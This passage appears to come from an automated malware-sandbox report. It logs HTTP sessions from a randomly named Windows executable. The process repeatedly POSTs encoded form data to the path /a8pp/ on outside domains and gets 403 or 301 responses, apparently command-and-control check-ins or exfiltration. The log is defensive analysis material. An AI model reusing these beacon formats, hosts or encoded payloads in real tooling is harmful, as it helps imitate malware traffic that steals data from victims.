                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.click-advertising.net
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:35:10.422995090 CEST355INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:35:10 GMT
                                        Content-Type: text/html;charset=gb2312
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Data Raw: 61 33 0d 0a 3c 74 69 74 6c 65 3e c9 cf c3 c5 d4 bc c5 c4 c1 aa cf b5 b7 bd ca bd 2d b8 bd bd fc b5 e7 bb b0 d6 b1 bd d3 d4 bc b0 ae 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: a3<title>-</title><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><script src="/js.js"></script>0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        9192.168.11.304980391.195.240.19807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:35:16.018084049 CEST769OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.continentaloilandgas.com
                                        Origin: http://www.continentaloilandgas.com
                                        Referer: http://www.continentaloilandgas.com/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 54 56 4c 62 5a 58 6e 33 51 65 34 4d 42 6e 62 68 36 4e 67 47 63 67 70 6e 63 44 77 2b 4a 64 62 36 2b 78 79 6c 36 46 5a 66 72 79 42 53 6d 49 4f 50 45 42 48 2b 57 6d 41 38 62 4f 49 32 76 51 31 71 78 4d 2b 33 61 56 30 31 68 73 47 67 62 32 53 75 36 38 32 5a 4d 34 47 41 53 36 69 6a 63 65 47 39 64 75 66 77 63 35 63 55 4e 72 57 47 78 47 79 4f 6a 49 42 61 71 30 64 70 2f 43 58 75 45 36 48 2b 6d 53 69 68 66 30 6e 61 57 58 78 57 4c 49 37 77 57 43 34 37 63 30 2f 4a 2b 38 4d 6a 74 76 4d 30 2f 37 6d 79 73 62 7a 61 70 71 42 66 58 73 53 63 79 77 61 37 4f 69 31 42 61 58 32 43 58 6f 4b 61 50 41 3d 3d
                                        Data Ascii: 2NlhHLS8=TVLbZXn3Qe4MBnbh6NgGcgpncDw+Jdb6+xyl6FZfryBSmIOPEBH+WmA8bOI2vQ1qxM+3aV01hsGgb2Su682ZM4GAS6ijceG9dufwc5cUNrWGxGyOjIBaq0dp/CXuE6H+mSihf0naWXxWLI7wWC47c0/J+8MjtvM0/7mysbzapqBfXsScywa7Oi1BaX2CXoKaPA==
                                        Jun 4, 2024 14:35:16.244477987 CEST208INHTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        10192.168.11.304980491.195.240.19807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:35:18.773021936 CEST789OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.continentaloilandgas.com
                                        Origin: http://www.continentaloilandgas.com
                                        Referer: http://www.continentaloilandgas.com/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 54 56 4c 62 5a 58 6e 33 51 65 34 4d 44 48 72 68 35 75 34 47 65 41 70 67 5a 44 77 2b 63 4e 62 2b 2b 78 2b 6c 36 48 31 50 72 68 6c 53 6e 71 57 50 57 55 7a 2b 58 6d 41 38 56 75 49 35 68 77 30 6b 78 4d 79 52 61 55 59 31 68 73 43 67 62 79 57 75 36 4e 32 57 4d 6f 47 43 5a 61 69 6c 44 75 47 39 64 75 66 77 63 34 34 75 4e 71 2b 47 78 57 43 4f 79 63 55 4d 70 30 63 62 36 43 58 75 4a 61 48 36 6d 53 69 66 66 31 71 50 57 56 5a 57 4c 4d 2f 77 52 57 4d 34 53 30 2f 4c 67 4d 4e 75 73 66 35 73 30 36 6a 47 67 34 50 69 73 37 78 32 53 37 6a 47 76 7a 75 35 64 43 4a 73 47 57 62 71 56 71 4c 42 53 49 56 50 5a 50 6a 6e 6a 74 49 68 39 44 52 2f 6d 47 50 73 31 45 6b 3d
                                        Data Ascii: 2NlhHLS8=TVLbZXn3Qe4MDHrh5u4GeApgZDw+cNb++x+l6H1PrhlSnqWPWUz+XmA8VuI5hw0kxMyRaUY1hsCgbyWu6N2WMoGCZailDuG9dufwc44uNq+GxWCOycUMp0cb6CXuJaH6mSiff1qPWVZWLM/wRWM4S0/LgMNusf5s06jGg4Pis7x2S7jGvzu5dCJsGWbqVqLBSIVPZPjnjtIh9DR/mGPs1Ek=
                                        Jun 4, 2024 14:35:18.998558998 CEST208INHTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        11192.168.11.304980591.195.240.19807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:35:21.522898912 CEST1706OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.continentaloilandgas.com
                                        Origin: http://www.continentaloilandgas.com
                                        Referer: http://www.continentaloilandgas.com/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 54 56 4c 62 5a 58 6e 33 51 65 34 4d 44 48 72 68 35 75 34 47 65 41 70 67 5a 44 77 2b 63 4e 62 2b 2b 78 2b 6c 36 48 31 50 72 68 74 53 6d 5a 65 50 45 6e 72 2b 55 6d 41 38 4c 2b 49 70 68 77 31 34 78 50 43 56 61 55 45 50 68 75 4b 67 4a 48 43 75 7a 66 4f 57 43 6f 47 43 57 36 69 67 63 65 47 6f 64 75 50 30 63 34 6f 75 4e 71 2b 47 78 55 61 4f 69 34 41 4d 76 30 64 70 2f 43 58 59 45 36 48 47 6d 53 72 6e 66 31 76 30 58 6b 35 57 4c 6f 62 77 54 6a 34 34 61 30 2f 4e 68 4d 4d 39 73 66 6c 4e 30 36 75 39 67 35 37 49 73 34 68 32 66 2f 79 6a 35 33 79 31 66 7a 64 46 4a 53 58 6f 56 70 66 4f 58 36 4a 72 52 2f 72 44 6b 70 6b 6f 39 6c 5a 30 31 6e 48 74 32 51 65 53 73 78 6f 62 2b 2b 47 6c 2f 77 4d 51 59 63 6e 37 70 39 68 75 68 2b 79 71 38 4b 46 30 59 36 44 7a 72 52 67 31 74 6b 30 70 47 58 42 64 4c 71 76 30 70 69 67 35 36 53 55 33 61 4b 36 72 61 30 41 38 39 34 65 77 37 66 4b 2b 38 64 4f 6c 42 75 47 64 4c 31 55 72 66 35 34 44 48 6a 72 2b 69 49 2b 6d 30 53 48 55 42 59 6b 33 34 77 7a 53 50 38 4e 63 49 [TRUNCATED]
                                        Data Ascii: 2NlhHLS8=TVLbZXn3Qe4MDHrh5u4GeApgZDw+cNb++x+l6H1PrhtSmZePEnr+UmA8L+Iphw14xPCVaUEPhuKgJHCuzfOWCoGCW6igceGoduP0c4ouNq+GxUaOi4AMv0dp/CXYE6HGmSrnf1v0Xk5WLobwTj44a0/NhMM9sflN06u9g57Is4h2f/yj53y1fzdFJSXoVpfOX6JrR/rDkpko9lZ01nHt2QeSsxob++Gl/wMQYcn7p9huh+yq8KF0Y6DzrRg1tk0pGXBdLqv0pig56SU3aK6ra0A894ew7fK+8dOlBuGdL1Urf54DHjr+iI+m0SHUBYk34wzSP8NcItf4uNVSS8rI9oTi/NMaPfNue6kXVC+WrwjXl9bCg8o7x/UveP6t64h1YZgs+pfSQ9ZSLiacAkIw7D2KODdBcXVIYKwCXIqByxbMjTWFLTrZgWzsqlJ+NuY5g1sG44CFp4BRIl/uJH2DP8XvJHHsKV4PK+okdpJMBq+PrX7Ll9SaSXvd3vM8PaJzf67oJEzO3FXVNZERbwnzo/WCYsYglQXbCfkM38820vZkZwlPf62mVg8CgHSzM42YYNtma1E8A2GHF+t1SxjlmronAE4crsEgr8+w4KmSM3FoJQsIz9ePQC6gT5jMyyxbCW2s4zYP42BWt5m/OViattCL4y56WXvNIiVpdeXpQa5/jfbVbJlZLFHVpUTtRN2fl9nQ3F0qHlSj1VE+wQckXsavfNB7+OM8Afr2aXeptqzUXUSBC4OghI19inKWE1wc48GuVhOPn+qIv+VtZDMev0TC563AyLn9CHJOw15OW8epF3H6LJ7DqU4oRpfTJwuDmvPEcGZgL6ktaiB78+Dl2Iy+5iZAlL3ayWSAW519oKcGOKy8ubnYDVQJSSaWqZzjdd7sEIccYahbWPXvoRV37rogOqzuLpqTfTMmqm2u3SNlZIb5VCzaGIWHFVTqysYwnwL+MQNlXGj4AS9+StdZAlmf2bqAolO3U45GkS1ejse [TRUNCATED]
                                        Jun 4, 2024 14:35:21.748950958 CEST208INHTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        12192.168.11.304980691.195.240.19807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:35:24.278239965 CEST478OUTGET /a8pp/?2NlhHLS8=eXj7agnwQ7UtDQTI2/QeRjNOKmxKRYHEwlq+kXNt3DleoKuUYGucHmIzSo9PpxNipdSpHjsdoNiIZ3Hh69GYDO27Wp3lPM6WDcDlV706K5XwonPjk8UKoRY=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.continentaloilandgas.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:35:24.509035110 CEST208INHTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        13192.168.11.3049807172.67.205.56807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:35:29.905637026 CEST760OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.barrettdigitalart.com
                                        Origin: http://www.barrettdigitalart.com
                                        Referer: http://www.barrettdigitalart.com/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 4d 74 36 34 33 78 7a 4a 77 36 49 6d 39 30 70 46 65 30 7a 7a 58 31 49 52 2b 6c 46 71 47 48 6b 67 78 71 52 55 48 37 61 66 66 5a 4a 33 31 76 7a 69 73 6a 64 71 77 57 79 38 39 39 66 33 6c 44 2f 37 56 63 6f 72 79 4b 65 70 6d 74 37 71 74 4f 57 4e 6f 54 53 6b 33 67 4f 4f 4f 73 75 66 6c 67 53 78 54 79 55 45 76 69 7a 68 79 77 36 44 4a 36 54 67 6b 48 32 69 5a 53 66 78 44 41 7a 77 6f 6b 66 55 76 44 71 57 71 69 50 6e 45 6c 6f 62 61 73 70 76 37 46 61 79 4e 37 4a 32 4a 71 41 41 43 70 35 6b 38 69 30 74 38 38 57 69 78 44 6c 64 6e 64 51 6a 57 6c 57 45 73 4d 31 47 43 33 4f 72 6e 71 32 68 79 41 3d 3d
                                        Data Ascii: 2NlhHLS8=Mt643xzJw6Im90pFe0zzX1IR+lFqGHkgxqRUH7affZJ31vzisjdqwWy899f3lD/7VcoryKepmt7qtOWNoTSk3gOOOsuflgSxTyUEvizhyw6DJ6TgkH2iZSfxDAzwokfUvDqWqiPnElobaspv7FayN7J2JqAACp5k8i0t88WixDldndQjWlWEsM1GC3Ornq2hyA==
                                        Jun 4, 2024 14:35:30.081255913 CEST814INHTTP/1.1 301 Moved Permanently
                                        Date: Tue, 04 Jun 2024 12:35:30 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Location: https://www.barrettdigitalart.com/a8pp/
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DcSlNnU%2BDpgFXsKs%2B2moimqanwn1k7dYzTVhug2wVuom6VN6pqYS2yI%2BxF1zbnN%2FyCQtukuahr0PmIJj9I565eE5jNaxNWTbOSfK20rCs3LRfK9SfD2%2BLsz3WXprj4zB3maD2iBZERkl0ui2"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 88e7f6905a27b030-ATL
                                        alt-svc: h3=":443"; ma=86400
                                        Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                        Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.22.1</center></body></html>
                                        Jun 4, 2024 14:35:30.081365108 CEST5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        14192.168.11.3049808172.67.205.56807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:35:32.566266060 CEST780OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.barrettdigitalart.com
                                        Origin: http://www.barrettdigitalart.com
                                        Referer: http://www.barrettdigitalart.com/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 4d 74 36 34 33 78 7a 4a 77 36 49 6d 2f 56 5a 46 62 53 37 7a 44 6c 49 53 69 56 46 71 66 58 6b 6b 78 71 64 55 48 2f 43 50 66 4b 74 33 31 4f 44 69 72 52 31 71 31 57 79 38 7a 64 66 75 39 6a 2f 73 56 63 6c 65 79 4f 61 70 6d 74 76 71 74 50 47 4e 6f 6c 61 6e 32 77 4f 49 49 73 75 64 36 77 53 78 54 79 55 45 76 69 33 66 79 78 53 44 4a 4c 6a 67 6c 69 43 68 55 79 66 79 43 41 7a 77 69 30 65 38 76 44 71 77 71 6a 54 42 45 6e 51 62 61 74 5a 76 37 30 61 39 57 4c 4a 30 48 4b 42 50 4c 62 39 74 35 77 4d 5a 33 64 32 66 70 43 34 68 6d 4b 68 35 4c 6d 69 47 2f 73 4a 72 65 32 6a 44 6c 6f 33 36 76 46 51 58 69 72 49 64 36 79 64 46 4d 57 4b 62 55 46 44 75 51 39 59 3d
                                        Data Ascii: 2NlhHLS8=Mt643xzJw6Im/VZFbS7zDlISiVFqfXkkxqdUH/CPfKt31ODirR1q1Wy8zdfu9j/sVcleyOapmtvqtPGNolan2wOIIsud6wSxTyUEvi3fyxSDJLjgliChUyfyCAzwi0e8vDqwqjTBEnQbatZv70a9WLJ0HKBPLb9t5wMZ3d2fpC4hmKh5LmiG/sJre2jDlo36vFQXirId6ydFMWKbUFDuQ9Y=
                                        Jun 4, 2024 14:35:32.773297071 CEST808INHTTP/1.1 301 Moved Permanently
                                        Date: Tue, 04 Jun 2024 12:35:32 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Location: https://www.barrettdigitalart.com/a8pp/
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l9GCDbViWug7Kfnoz9gqhgxB54Y2TgagedbVI%2B2IfoWzqX7qfqEy3tTZMnHRl1jefSX1DTMglyNEm%2FAQGXXg3YPTCS49ClTdczFIDyKklfuZuaFejuqoXoUlAD6Xk42EeYE9rhAfjU6VMmPM"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 88e7f6a0fe4aa4d9-MIA
                                        alt-svc: h3=":443"; ma=86400
                                        Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                        Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.22.1</center></body></html>
                                        Jun 4, 2024 14:35:32.773309946 CEST5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        15192.168.11.3049809172.67.205.56807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:35:35.227344990 CEST1697OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.barrettdigitalart.com
                                        Origin: http://www.barrettdigitalart.com
                                        Referer: http://www.barrettdigitalart.com/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 4d 74 36 34 33 78 7a 4a 77 36 49 6d 2f 56 5a 46 62 53 37 7a 44 6c 49 53 69 56 46 71 66 58 6b 6b 78 71 64 55 48 2f 43 50 66 4b 6c 33 31 59 66 69 73 41 31 71 32 57 79 38 73 74 66 72 39 6a 2f 74 56 63 73 57 79 4f 58 53 6d 76 58 71 74 74 65 4e 2f 41 36 6e 34 77 4f 49 45 4d 75 59 6c 67 53 65 54 7a 34 49 76 69 6e 66 79 78 53 44 4a 49 72 67 6c 33 32 68 57 79 66 78 44 41 7a 6b 6f 6b 66 52 76 48 2f 4c 71 6a 48 33 48 58 77 62 61 4e 4a 76 6f 69 4f 39 61 4c 4a 71 41 4b 41 51 4c 61 41 31 35 77 41 2f 33 65 72 36 70 41 6f 68 6e 65 77 62 66 69 33 62 69 65 6f 68 62 55 37 66 6c 6f 62 2b 73 46 73 70 6e 4e 59 39 7a 78 56 64 41 78 61 78 4a 33 2f 76 4a 6f 6e 77 49 63 33 37 69 6a 41 32 53 36 4c 7a 67 53 74 58 66 59 47 36 58 31 55 30 59 41 5a 63 51 53 52 54 7a 6b 52 49 4d 73 50 39 4e 6d 73 76 4a 66 65 4b 33 2f 76 6c 4d 50 6f 46 34 65 74 5a 5a 39 2f 44 59 33 2f 63 59 6a 55 66 35 75 56 68 72 59 77 6c 38 58 46 59 37 53 77 4f 62 63 79 6f 6a 31 69 61 70 35 4f 41 66 4c 7a 49 38 69 57 33 43 59 7a 72 6c [TRUNCATED]
                                        Data Ascii: 2NlhHLS8=Mt643xzJw6Im/VZFbS7zDlISiVFqfXkkxqdUH/CPfKl31YfisA1q2Wy8stfr9j/tVcsWyOXSmvXqtteN/A6n4wOIEMuYlgSeTz4IvinfyxSDJIrgl32hWyfxDAzkokfRvH/LqjH3HXwbaNJvoiO9aLJqAKAQLaA15wA/3er6pAohnewbfi3bieohbU7flob+sFspnNY9zxVdAxaxJ3/vJonwIc37ijA2S6LzgStXfYG6X1U0YAZcQSRTzkRIMsP9NmsvJfeK3/vlMPoF4etZZ9/DY3/cYjUf5uVhrYwl8XFY7SwObcyoj1iap5OAfLzI8iW3CYzrlYc14ilVSV7XV7LyaTmd/XiUBbeNi0YKKsw7Ci+J97jpXF4vA+gpmTFANNxTBLzNUTuKrp1e3Z+sfBDitgcpl1BEw+agfg+/CjUn+R9yXCKPIbJMMPbOBeAJ/NMpIiZtbVm1nKJDtW9vt1mYoJEhUMg5kHAtCPySH14QizTEMKFsTtPfdBl8y5QCtpDd33y5ybAIgbgv+E8M5ztXY4voGdG8D/J4HTm72xyiARSxo85XMa2MmZnm1bh5dfA9/xSvRa5zc1IfEm/IvK0gta+qpqi7Z9uBxLpeSWVu2Zaxm0s9AFVUuIFwFi/Zn2qUPSL08FRdbExoNMnJnD0wd8sLKqnthtSUF3yZAtry2P2foM5QWXUfDO/3YvxBSyYKDYR0VcGs20Z1/9ZOBjq8tAsOR6EGxboSq/psjbILCUHkNdVT0mzTY6hkiZ9ohZyQ3BaMo8OSfrZKS0w0Qcf4ffDD5ZOQ5vxJ+SD+hz3wk0KzA+eNRvAAhGCEuQtV4k9CK1Tmb85erNYLeLg9I9vp/aouTVy1umYMzu8IVkZQqzGhtxArRFgI+xtm5/9IqPPwUqyoo9x5jYckPSjjSEKihkSkfUC2m9cwbysklFJHnmRMtJShbz0rv6DZzL7ANksphs4fuUXN9ztIsS9GDfzJz0Euf+Wj5KlCrGo4QYB [TRUNCATED]
                                        Jun 4, 2024 14:35:35.443810940 CEST808INHTTP/1.1 301 Moved Permanently
                                        Date: Tue, 04 Jun 2024 12:35:35 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Location: https://www.barrettdigitalart.com/a8pp/
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2BKMw3BmZ2SJkesFgXyu1NtjvBPhhi1s27mqnZqfZc4DTSRPFe4i5ABuCUmSXZjmzHWhp746cqDSqH5XnbeT%2FOGCnE08pTKj324oNC4V3H6MPDB1SmfDl7mnwWYGzehQ2LkWeJp1b1SLZGme"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 88e7f6b19eff21f4-MIA
                                        alt-svc: h3=":443"; ma=86400
